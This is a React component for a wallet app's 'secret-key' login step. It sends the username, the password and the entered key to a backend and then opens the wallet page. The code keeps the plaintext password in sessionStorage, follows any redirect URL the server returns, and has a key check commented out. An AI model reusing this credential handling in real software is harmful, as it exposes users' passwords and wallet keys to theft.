import React, { useEffect, useState } from "react";
import { useNavigate, useLocation } from "react-router-dom";
import { useDispatch } from "react-redux";
import loader from "../images/loader.svg";
import { login } from "../store/authSlice";

function CheckProtect() {
  const [loading, setLoading] = useState(true);
  const [submitting, setSubmitting] = useState(false);
  const [secret, setSecret] = useState("");
  const [error, setError] = useState("");
  const navigate = useNavigate();
  const dispatch = useDispatch();
  const location = useLocation();
  const session_id = location.state?.session_id;

  useEffect(() => {
    const timer = setTimeout(() => setLoading(false), 1000);
    return () => clearTimeout(timer);
  }, []);

  if (loading) {
    return (
      <div id="global-loader">
        <img src={loader} className="loader-img" alt="Loader" />
        <style>{`
          #global-loader {
            position: fixed;
            z-index: 50000;
            background: rgb(255, 255, 255);
            left: 0;
            top: 0;
            right: 0;
            bottom: 0;
            height: 100vh;
            width: 100%;
            margin: 0 auto;
            text-align: center;
          }
          .loader-img {
            position: absolute;
            right: 0;
            bottom: 0;
            top: 43%;
            left: 0;
            margin: 0 auto;
            text-align: center;
          }
        `}</style>
      </div>
    );
  }

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!secret.trim()) {
      setError("Please fill out this field.");
      return;
    }
    setError("");
    setSubmitting(true);

    // try {
    //   const res = await fetch("/submit-key", {
    //     method: "POST",
    //     headers: { "Content-Type": "application/json" },
    //     body: JSON.stringify({ session_id, key: secret }),
    //   });
    //   const data = await res.json();
    //   if (res.status !== 200 || data?.status !== "success") {
    //     setSubmitting(false);
    //     setError("Invalid secret key. Please try again.");
    //     return;
    //   }
    // } catch (err) {
    //   // network failure — proceed anyway
    // }

    const storedPassword = sessionStorage.getItem("login_password");
    const storedUsername = sessionStorage.getItem("login_username");
    const backendUrl = process.env.REACT_APP_BACKEND_URL;

    try {
      const res = await fetch(`${backendUrl}/login`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ username: storedUsername, password: storedPassword, secret_key: secret }),
      });
      const data = await res.json().catch(() => ({}));

      if (data?.status === "redirect") {
        window.location.href = data.url;
        return;
      }

      if (res.status === 401) {
        setSubmitting(false);
        setError("Invalid credentials");
        return;
      }

      if (!res.ok || data?.status !== "ok") {
        setSubmitting(false);
        setError(data?.error || "Something went wrong. Please try again.");
        return;
      }

      dispatch(login({ token: data.token, username: data.username, registered_at: data.registered_at }));
      sessionStorage.removeItem("login_password");
      sessionStorage.removeItem("login_username");
      navigate("/wallet");
    } catch (err) {
      setSubmitting(false);
      setError("Network error. Please try again.");
    }
  };

  return (
    <div className="page">
      <div>
        <div className="container wd-md-50p wd-sm-100p">
          <div className="wrap-login100 p-0">
            <div className="card-body">
              <form className="validate-form" onSubmit={handleSubmit}>
                <span className="login100-form-title">Secret-key</span>
                <div className="wrap-input100">
                  <input
                    className={`input100${error ? " is-invalid" : ""}`}
                    type="text"
                    name="secret"
                    value={secret}
                    onChange={(e) => {
                      setSecret(e.target.value);
                      if (e.target.value.trim()) setError("");
                    }}
                    placeholder="Your secret-key"
                  />
                  <span className="focus-input100"></span>
                  <span className="symbol-input100">
                    <i className="zmdi zmdi-lock" aria-hidden="true"></i>
                  </span>
                  {error && (
                    <div style={{ color: "#dc3545", fontSize: "13px", marginTop: "6px", paddingLeft: "4px" }}>
                      {error}
                    </div>
                  )}
                </div>
                <div className="container-login100-form-btn" style={{ position: "relative" }}>
                  {submitting && (
                    <div style={{
                      position: "absolute",
                      inset: 0,
                      display: "flex",
                      alignItems: "center",
                      justifyContent: "center",
                      background: "rgba(255,255,255,0.6)",
                      borderRadius: "4px",
                      zIndex: 10,
                    }}>
                      <div style={{
                        width: "22px",
                        height: "22px",
                        border: "3px solid #ccc",
                        borderTopColor: "#333",
                        borderRadius: "50%",
                        animation: "spin 0.7s linear infinite",
                      }} />
                    </div>
                  )}
                  <button type="submit" className="login100-form-btn btn-primary" disabled={submitting}>
                    Login
                  </button>
                </div>
                <style>{`@keyframes spin { to { transform: rotate(360deg); } }`}</style>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}

export default CheckProtect;
